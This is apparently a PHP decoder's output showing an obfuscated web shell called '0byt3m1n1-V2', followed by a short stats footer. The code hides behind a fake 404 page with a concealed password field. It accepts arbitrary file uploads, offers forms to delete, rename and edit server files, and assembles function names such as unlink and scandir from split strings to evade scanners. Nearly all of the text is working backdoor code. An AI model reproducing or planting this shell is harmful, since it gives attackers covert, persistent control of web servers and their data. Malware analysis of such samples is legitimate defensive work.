"\74\x2f\x63\145\156\164\145\162\76\x3c\x2f\x74\144\x3e\x3c\x74\x64\76\x3c\143\x65\x6e\x74\x65\x72\x3e\74\146\157\162\x6d\x20\155\145\164\x68\157\144\x3d\x22\x50\117\123\124\42\40\x61\x63\164\151\x6f\156\x3d\42\x3f\x6f\x70\164\151\x6f\x6e\46\160\141\x74\150\75{$path}\42\76\x3c\x73\x65\154\145\x63\x74\40\156\141\155\x65\x3d\x22\157\x70\x74\42\x3e\74\157\x70\x74\151\157\156\x20\166\x61\154\x75\x65\75\42\42\76\74\x2f\x6f\x70\x74\151\x6f\156\76\x3c\157\160\x74\x69\157\156\x20\166\x61\x6c\165\x65\x3d\42\x64\x65\154\145\164\x65\42\x3e\x44\145\154\145\x74\x65\x3c\57\157\x70\164\x69\157\x6e\76\x3c\x6f\x70\164\x69\157\x6e\x20\166\x61\154\165\145\75\42\x72\x65\156\x61\x6d\x65\42\x3e\122\x65\x6e\141\155\145\x3c\x2f\157\x70\x74\x69\157\x6e\76\74\x6f\x70\x74\151\157\x6e\40\x76\x61\x6c\165\145\x3d\42\145\144\x69\164\42\76\x45\x64\151\x74\x3c\x2f\157\x70\164\x69\157\156\x3e\74\x2f\163\x65\154\x65\143\164\x3e\x3c\x69\156\160\165\x74\x20\164\x79\160\145\x3d\42\x68\151\x64\144\x65\156\x22\40\x6e\x61\155\145\75\42\164\x79\x70\x65\x22\40\166\141\154\x75\x65\x3d\x22\x66\151\x6c\145\42\76\74\151\156\160\165\164\40\164\171\160\x65\x3d\x22\150\151\144\144\x65\156\42\x20\156\x61\x6d\x65\75\x22\x6e\141\155\x65\x22\40\x76\x61\x6c\x75\x65\75\42{$file}\42\76\x3c\151\x6e\160\x75\164\40\164\171\x70\x65\x3d\42\150\x69\144\144\145\156\42\x20\x6e\x61\x6d\x65\x3d\x22\x70\x61\x74\x68\x22\40\x76\141\154\165\x65\75\42{$path}\57{$file}\42\76\74\x69\x6e\160\165\x74\x20\x74\171\x70\145\x3d\42\163\165\142\155\151\x74\x22\40\x76\141\x6c\165\x65\75\x22\x2b\x22\x20\x2f\76\74\57\x66\x6f\x72\x6d\76\x3c\57\143\145\156\164\x65\162\76\74\x2f\164\x64\x3e\74\57\x74\x72\76"; } echo "\x3c\57\x74\141\142\154\145\76\x3c\x2f\144\151\x76\x3e"; } goto JAwo_; hicZp: if (isset($_FILES["\146\151\x6c\145"])) { if (copy($_FILES["\146\x69\154\145"]["\x74\155\x70\x5f\156\x61\155\145"], $path . "\57" . $_FILES["\x66\151\154\x65"]["\x6e\x61\x6d\145"])) { echo "\x3c\143\145\156\x74\x65\162\x3e\74\146\x6f\156\164\40\143\x6f\x6c\157\x72\x3d\x22\x23\x30\x30\x66\146\60\x30\42\76\125\x70\x6c\x6f\x61\144\40\117\x4b\41\x3c\x2f\x66\x6f\156\x74\x3e\x3c\x2f\143\145\156\x74\145\162\x3e\x3c\x62\x72\57\x3e"; } else { echo "\x3c\143\x65\x6e\164\x65\162\x3e\x3c\x66\x6f\x6e\x74\40\143\157\154\x6f\162\x3d\42\162\x65\x64\42\x3e\125\x70\x6c\157\141\x64\40\106\x41\x49\x4c\105\104\41\74\x2f\146\x6f\x6e\164\x3e\x3c\x2f\143\145\156\x74\x65\x72\x3e\74\142\x72\x2f\x3e"; } } goto odIG9; Msegu: $__fgetcon7s = "\146\x69\154\145" . "\137\147\x65\164\x5f\x63\157\x6e\x74\x65\x6e\164\x73"; goto vG7e0; LJplN: echo "\74\41\104\x4f\x43\124\131\120\105\x20\150\164\x6d\154\76\x3c\150\x74\155\154\x3e\74\150\x65\141\x64\x3e\74\x6d\x65\164\x61\40\x6e\141\155\x65\x3d\42\162\157\142\x6f\164\x73\x22\40\143\x6f\156\164\x65\156\164\x22\x6e\x6f\x69\x6e\144\x65\170\x2e\40\x6e\157\x66\x6f\154\x6c\157\167\x22\76\74\x6c\x69\156\153\40\150\x72\x65\x66\75\x22\150\x74\x74\x70\x73\x3a\x2f\x2f\x66\x6f\x6e\x74\x73\56\147\157\157\x67\154\x65\141\160\x69\x73\56\x63\157\155\x2f\x63\x73\x73\77\146\x61\155\x69\x6c\171\75\x56\124\63\x32\63\x22\40\162\x65\154\x3d\x22\163\164\171\154\145\x73\x68\145\x65\x74\x22\76\74\x74\x69\164\154\145\x3e" . $sname . "\x3c\57\x74\x69\164\154\145\x3e\x3c\x73\x63\x72\151\160\x74\40\x73\162\x63\75\x22\150\x74\x74\160\163\x3a\57\x2f\141\152\141\x78\x2e\147\157\157\x67\x6c\145\x61\x70\x69\163\56\143\x6f\x6d\x2f\x61\152\x61\x78\x2f\154\151\x62\163\57\x6a\x71\165\145\x72\171\x2f\x33\56\63\56\61\57\x6a\161\x75\x65\x72\171\56\x6d\x69\x6e\56\152\163\42\x3e\74\57\163\143\162\x69\x70\164\76\74\154\151\156\x6b\40\150\x72\x65\x66\x3d\x22\57\57\172\x65\x72\x6f\142\x79\164\x65\55\151\x64\x2e\x67\x69\164\x68\165\x62\x2e\151\157\57\x50\x48\120\55\x42\141\143\x6b\x64\x6f\x6f\x72\57\x69\156\143\57\x6d\x31\156\x31\x2e\143\163\163\42\x20\x72\145\154\75\x22\x73\164\x79\x6c\145\x73\150\x65\x65\x74\42\40\164\x79\160\x65\x3d\x22\164\145\x78\164\57\143\x73\163\x22\76\74\x2f\x68\x65\141\x64\76\x3c\142\x6f\x64\171\76"; goto SyUFS; vG7e0: $__scdir = "\163" . "\143\x61\156\x64\151" . "\162"; goto BoXDS; XjzSS: $paths = explode("\57", $path); goto cekk3; hSYfA: echo "\x3c\x2f\142\157\x64\171\x3e\74\x2f\150\164\x6d\x6c\x3e\74\41\55\x2d\40\x45\x4f\x46\x20\x2d\x2d\76"; goto h2stU; cekk3: echo "\x3c\x74\x61\142\x6c\145\x20\167\x69\x64\x74\150\x3d\42\61\x30\60\x25\42\x20\x62\x6f\x72\x64\x65\162\x3d\x22\60\42\x20\141\x6c\151\x67\x6e\x3d\42\143\x65\156\164\145\162\x22\x20\163\164\x79\x6c\145\x3d\42\155\x61\162\147\x69\x6e\55\x74\x6f\160\72\55\61\x30\x70\x78\x3b\x22\76\x3c\x74\x72\x3e\74\x74\x64\76"; goto OmIbE; BoXDS: $rm__dir = "\162\x6d\144" . "\x69\162"; goto bGl2e; odIG9: echo "\74\57\x74\144\x3e\74\57\x74\x72\76\x3c\x74\162\76\74\164\x64\76\74\57\x74\141\x62\x6c\145\76\74\144\x69\166\x20\143\154\141\163\163\75\42\x74\x61\142\x6c\145\x2d\x64\x69\166\42\x3e\74\57\144\x69\166\x3e\74\x69\156\x70\165\164\x20\x69\144\75\x22\x69\x6d\141\x67\x65\42\x20\x74\171\160\x65\x3d\x22\x68\151\144\144\145\x6e\x22\x3e"; goto wP3Tc; cwb1S: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto LJplN; b_yuc: session_start(); goto ah3_T; fkrQx: error_reporting(0); goto X0P4o; LOwXJ: $sname = "\x30\x62\x79\x74\x33\155\61\156\x31" . "\55\x56\62"; goto Y8Hsr; xP9t4: function printLoginx() { echo "\x3c\x21\104\x4f\x43\124\x59\120\x45\x20\150\x74\155\154\76\x3c\150\x74\x6d\154\76\74\150\x65\141\144\76\74\x6d\145\x74\x61\40\156\141\155\x65\x3d\42\x72\157\x62\157\164\x73\42\x20\x63\157\156\164\x65\x6e\x74\x22\x6e\157\x69\x6e\x64\145\x78\56\40\156\x6f\146\x6f\154\154\157\x77\42\x3e\x3c\x74\x69\164\x6c\x65\76\x3c\57\164\151\164\x6c\x65\x3e\x3c\x2f\x68\x65\141\144\76\74\x62\x6f\x64\171\76\12\x20\x3c\x68\61\76\116\157\x74\x20\106\157\165\156\x64\74\57\x68\x31\76\40\xa\40\x20\40\x20\40\x3c\x74\151\x74\154\145\76\64\60\x34\x20\116\x6f\x74\x20\x46\x6f\165\156\144\74\x2f\x74\151\x74\x6c\145\x3e\xa\x20\x3c\x73\164\x79\154\x65\x20\164\171\160\x65\75\x22\x74\145\170\x74\x2f\143\x73\163\42\x3e\12\x20\x69\x6e\160\x75\x74\133\x74\171\x70\145\x3d\x70\141\x73\x73\167\157\162\144\135\x20\x7b\12\x20\x20\40\40\x20\167\151\x64\164\150\72\x20\x32\x35\60\160\x78\73\12\x20\x20\40\x20\40\150\145\x69\147\x68\164\x3a\40\x32\x35\x70\x78\73\xa\x20\x20\x20\x20\40\143\157\154\x6f\162\72\40\x77\150\151\164\x65\73\12\x20\40\40\x20\x20\x62\141\x63\x6b\x67\162\157\x75\156\x64\x3a\x20\164\x72\x61\x6e\x73\160\141\162\x65\156\x74\x3b\12\40\x20\40\x20\40\x62\157\162\144\x65\x72\x3a\40\61\160\x78\x20\163\157\154\x69\x64\x20\x77\150\151\164\145\x3b\12\x20\x20\40\x20\x20\x6d\141\162\147\151\156\x2d\154\145\146\164\72\40\x32\x30\x70\170\x3b\12\x20\40\40\x20\40\164\x65\x78\164\x2d\x61\x6c\x69\x67\156\x3a\x20\143\145\156\164\x65\x72\73\12\x20\175\12\40\74\x2f\163\164\171\x6c\145\76\xa\40\x20\40\x20\40\x3c\x70\x3e\124\x68\145\40\x72\x65\x71\x75\145\x73\x74\145\x64\x20\125\122\x4c\x20\167\141\163\x20\x6e\x6f\x74\x20\146\157\x75\156\x64\40\157\x6e\x20\x74\150\151\163\40\163\145\x72\x76\x65\x72\x2e\x3c\x2f\160\76\40\xa\40\x3c\160\x3e\x41\x64\144\151\x74\x69\x6f\156\x61\154\x6c\x79\54\40\141\40\64\60\x34\40\116\157\164\x20\106\157\x75\156\144\40\x65\162\x72\157\162\40\x77\x61\163\x20\145\156\x63\157\x75\156\164\145\x72\x65\x64\40\x77\x68\x69\154\145\40\164\x72\171\151\x6e\x67\40\x74\x6f\40\x75\x73\x65\40\x61\156\x20\105\162\x72\157\162\104\x6f\143\165\x6d\145\x6e\164\x20\164\157\x20\150\x61\x6e\x64\154\145\x20\164\x68\x65\40\x72\x65\161\x75\145\163\164\56\74\x2f\x70\x3e\x20\xa\40\74\x68\162\76\x20\12\x20\74\x61\144\144\162\145\163\163\76\x41\160\141\143\150\145\40\123\x65\x72\166\x65\162\40\x61\x74\40" . $_SERVER["\x48\x54\x54\120\137\110\x4f\x53\x54"] . "\x20\120\157\x72\164\x20" . $_SERVER["\x53\105\122\x56\105\x52\x5f\x50\x4f\122\x54"] . "\74\57\141\x64\x64\162\145\163\163\x3e\40\xa\x20\x3c\143\x65\x6e\x74\x65\x72\76\74\146\157\x72\155\40\155\145\164\x68\157\144\x3d\42\160\157\x73\x74\42\x3e\74\151\156\160\165\164\40\x74\x79\x70\x65\75\x22\160\141\x73\x73\167\157\x72\144\x22\x20\x6e\x61\155\145\75\x22" . $_SESSION["\153\145\x79\x78\x78"] . "\x22\40\x61\x75\164\157\143\157\155\160\154\x65\x74\x65\x3d\42\157\x66\x66\x22\76\74\142\x72\76\x3c\x2f\146\x6f\x72\155\x3e\74\57\x63\x65\x6e\x74\145\x72\x3e\74\57\142\x6f\x64\x79\x3e\x3c\x2f\x68\164\x6d\154\x3e\xa\x20\40\x20\40"; die; } goto cNJXL; TXh1J: $keyxx = $_SESSION["\153\x65\x79\170\170"]; goto aRjXz; vmx3V: foreach ($paths as $id => $pat) { echo "\x3c\x61\40\x73\x74\x79\154\145\x3d\x27\146\157\156\x74\x2d\163\151\172\x65\x3a\61\63\x70\x78\x3b\47\40\x68\x72\145\146\x3d\47\77\160\x61\x74\150\x3d"; for ($i = 0; $i <= $id; $i++) { echo $paths[$i]; if ($i != $id) { echo "\x2f"; } } echo "\x27\76{$pat}\74\57\141\x3e\57"; } goto mYmL6; JAwo_: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\154"; } elseif (($perms & 32768) == 32768) { $info = "\55"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\x64"; } elseif (($perms & 8192) == 8192) { $info = "\143"; } elseif (($perms & 4096) == 4096) { $info = "\160"; } else { $info = "\x75"; } $info .= $perms & 256 ? "\162" : "\55"; $info .= $perms & 128 ? "\x77" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\x78" : ($perms & 2048 ? "\123" : "\55"); $info .= $perms & 32 ? "\162" : "\55"; $info .= $perms & 16 ? "\x77" : "\x2d"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\162" : "\x2d"; $info .= $perms & 2 ? "\167" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\x78" : ($perms & 512 ? "\124" : "\55"); return $info; } goto iJ9o4; bGl2e: $un__link = "\165\x6e" . "\x6c\151\156\153"; goto cwb1S; WKzjR: if (empty($_SESSION["\153\145\171\x78\170"])) { $keyxxx = generateRandomString(); $_SESSION["\153\145\x79\170\x78"] = $keyxxx; } goto TXh1J; h2stU: ?>
Function Calls
None |
Stats
MD5 | 7121afb4688b495e1a47b3629c0a8bb3 |
Eval Count | 0 |
Decode Time | 62 ms |